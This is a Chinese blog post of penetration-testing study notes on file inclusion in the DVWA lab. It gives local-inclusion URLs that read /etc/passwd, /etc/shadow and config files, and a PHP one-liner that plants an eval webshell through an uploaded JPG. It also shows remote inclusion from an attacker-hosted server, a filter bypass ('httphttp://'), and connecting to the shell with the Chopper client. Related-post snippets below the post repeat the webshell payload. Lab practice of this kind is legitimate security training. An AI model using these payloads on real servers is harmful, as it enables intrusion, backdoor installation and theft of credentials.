渗透学习-文件包含

最新推荐文章于 2024-04-16 05:33:36 发布
最新推荐文章于 2024-04-16 05:33:36 发布
阅读量262 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/memery_key/article/details/105798050
版权

文件包含

本地文件包含-低级

访问本地系统账号信息及其他敏感信息

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/passwd

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/shadow

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf

http://192.168.1.105/dvwa/robots.txt

需要一定运维能力才能找到敏感文件,这些目录仅限于靶机里位置

本地文件包含+webshell

1.制作一句话木马 e.g.monkey.jpg

<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[pengge]);?>')?>

密码就叫pengge

用这个软件打开输入代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1mHfDIYK-1587987615119)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427181531743.png)]

2、将图片上传到网站,并且查看是否成功上传

提示:

上传路径:http://192.168.1.105/dvwa/vulnerabilities/upload/

包含路径:http://192.168.1.105/dvwa/vulnerabilities/fi

//生成的PHP文件位置,即shell20.php

3、执行文件包含并生成后门

相对路径:http://192.168.1.105/dvwa/vulnerabilities/fi/?page=…/…/hackable/uploads/1.jpg

绝对路径:http://192.168.1.105/dvwa/vulnerabilities/fi/?page=var/www/dvwa/hackable/uploads/1.jpg

成功效果图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S433gxWG-1587987615123)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427183500615.png)]

再用菜刀连接获取shell

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0nRvnaOk-1587987615126)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427184313182.png)]

尝试添加文件,删除文件,看是否有权限

本地文件包含-中级

同上,查看源代码可以发现没影响,只是会将"http:"或者“https:“换为空格

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cQfWzvwN-1587987615131)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427191341967.png)]

本地文件包含-高级

 <?php
        
    $file = $_GET['page']; //The page we wish to display 

    // Only allow include.php
    if ( $file != "include.php" ) {
        echo "ERROR: File not found!";
        exit;
    }
        
?>

可以看出只能允许include.php。所以不行

远程文件包含+webshell

1、建立远程服务器,本项目使用kali作为远程服务器

#service apache2 start
#vim /var/www/html/pengge.txt
<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[pengge]);?>')?>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ACC6enIh-1587987615136)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427185413635.png)]

然后vim编辑器在/var/www/html下建立pengge.txt

在主机上访问

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vszm50g7-1587987615139)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190141590.png)]

然后执行文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fUHSQLEv-1587987615141)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190220973.png)]

看起来没效果,但进入能发现已经生成了shell20.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QyjK52Xi-1587987615143)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190338319.png)]

再用菜刀连接

略去过程了,如上面连接所示

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-e98zLh9g-1587987615146)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190808562.png)]

远程文件包含-中级

这个就有影响了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LUMNBWyb-1587987615149)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427191341967.png)]

所以我们可以将路径改为

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=httphttp://😕/192.168.1.103/pengge.txt

b-1587987615149)]

所以我们可以将路径改为

http://192.168.1.105/dvwa/vulnerabilities/fi/?page=httphttp://😕/192.168.1.103/pengge.txt

后台把http://换为空后就是正常的地址

memery_key
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
新手学习渗透资料文档
12-16
安全攻防文档、渗透测试是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节
DVWA_文件包含_中级+高级绕过方法
sx234com的博客
04-09 1868
1、中级 代码如下: 代码是过滤http://与https:// 的代码为"" 绕过思路: 构造绕过结构:例如 hthttp://tp:// 中间被代替成""后 剩下的字符任然是 http:// 成功绕过。 ...
网安学习文件漏洞(包括初级,中级,高级)
weixin_43527478的博客
02-06 359
网安学习文件漏洞(包括初级,中级,高级) 1.初级漏洞:只要求上传文件未对文件进行任何校验 直接上传一句话木马文件,然后通过菜刀进行连接,即可直接进行连接。 2.中级漏洞:对文件的MIME进行了要求需要启动代理功能 2.1启动其拦截功能 2.2更改其MIME即将Content-Type:更改为要求格式即image/jpeg,然后点击转发 2.3再用菜刀进行连接 3.高级漏洞:严格对上传文件进...
DVWA——文件包含
m0_74426634的博客
04-06 1343
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。
H5学习文档,超级好
04-03
很适合初级选手下载查阅的,很适合初级选手下载查阅的。
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
渗透测试工具-Cobalt Strike
03-21
Cobalt Strike提供了一整套的渗透测试解决方案,包括侦察、漏洞利用、持久化、权限提升、横向移动以及数据窃取等环节。 **Cobalt Strike的特点** 1. **多平台支持**:CS支持Windows、Linux和macOS操作系统,使得...
内网渗透专用-mimikatz
05-06
压缩包子文件文件名称列表包括: 1. `mimicom.idl`:这是一个接口定义语言(IDL)文件,可能包含了mimikatz的一个模块或组件的接口描述,供开发者了解或扩展mimikatz的功能。 2. `README.md`:这是标准的Markdown...
Web-安全渗透全套教程文件包含漏.zip
05-22
【标题】:“Web-安全渗透全套教程文件包含漏洞”指的是一个关于网络安全的教程,特别是针对Web应用程序的安全渗透测试。在Web开发中,"文件包含漏洞"是一个常见的安全问题,它允许攻击者通过注入恶意代码来控制或...
Dvwa之文件包含全级别学习笔记
Mbys_Lettuce的博客
10-21 964
文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
DVWA文件包含(不同级别)
qq_43452198的博客
04-22 1442
File Inclusion lowmediumhighimpossible 简介 File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任...
漏洞复现篇——文件包含漏洞(DVWA靶场---File Inclusion【低中高级绕过】)
爱国小白帽
02-19 3869
实验环境: PHPstudy DVWA靶场 菜刀 环境搭建 1、将DVWA Security級別换成low 2、打开php的配置文件,搜索allow_url_include,把off换成on,然后重启 模拟实验 本地文件包含(LFI) 1、点击File Inclusion中的file1.php 2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...
文件包含漏洞(本地包含
Xiongcanne的博客
04-25 985
第一步:制作图片木马(所需工具edjpqcom.exe) 将一个jpg文件拖入edjpgcom.exe 输入在含有文件包含漏洞文件夹中创建一句话木马的命令: <?fputs(fopen("shell20.php","w"),'<?php eval($_POST[xc]);?>')?> xc为连接木马密码 成功创建图片木马 使用靶机上传该jpg木马 使用文件包含漏洞包含该j...
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3151
渗透测试-文件包含漏洞以及php伪协议的应用
以题为例浅谈文件包含,2024年最新2024年大厂网络安全面经
最新发布
m0_60750088的博客
04-16 1038
审计一下这段代码:他会检测你的GET传参,看看传参没有,传参之后他会把你传递的参数后面在加一个.php就是它要包含文件名,它会在目录中找这个文件,如果找到了就进行包含,如果没有找到就去包含home.php,这里可以用%00截断;我们可以通过在url参数中写入一句话木马,进行执行,从而将一句话木马写入到日志文件中,我们可以通过包含写入木马的日志文件,从而进行命令执行。nginx服务器日志存放位置:/var/log/nginx/access.log和/var/log/nginx/error.log。
2. DVWA亲测文件包含漏洞
weixin_30740295的博客
05-14 286
Low级: 我们分别点击这几个file.php文件 仅仅是配置参数的变化: http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file3....
渗透之路基础 -- 文件包含
09-16 502
本地包含漏洞 PHP常见函数 include() <?php $file=$_GET['f']; include($file); ?> 文件包含漏洞原理:利用include的函数执行网站服务器的文件 想要访问test外的 phpinfo.php文件可以这样访问 漏洞产生: 可控变量 $file 使用函数 include 其他函数 include_once,requ...
深入分析ELF文件结构及其载入过程
ronnie88597的博客
09-17 2980
文章目录前言ELF目标文件类型以下面例子深入分析ELF详解file命令结果的各个部分ELF的文件结构ELF知识扩展Linux系统装载ELF的过程用户层面系统层面 前言 一般程序符号和数据,包括:全局变量,静态全局变量,全局函数,静态全局函数,外部符号(函数/变量),局部变量,局部静态变量,字面量(常量)等。程序从源码(如:C语言)到ELF二进制可执行文件,一般需要通过编译器和链接器来处理并生产。 ELF文件由4部分组成,分别是ELF头(ELF header)、程序头表(Program header tabl
掌握文件包含渗透:从入门到精通与实战示例
"文件包含渗透(FileInclusion...在学习过程中,理解并掌握防范策略至关重要,这包括限制文件包含的范围、使用安全的编程模式,以及实施严格的输入验证和过滤机制,以确保Web应用在面临恶意攻击时能够保持稳定和安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值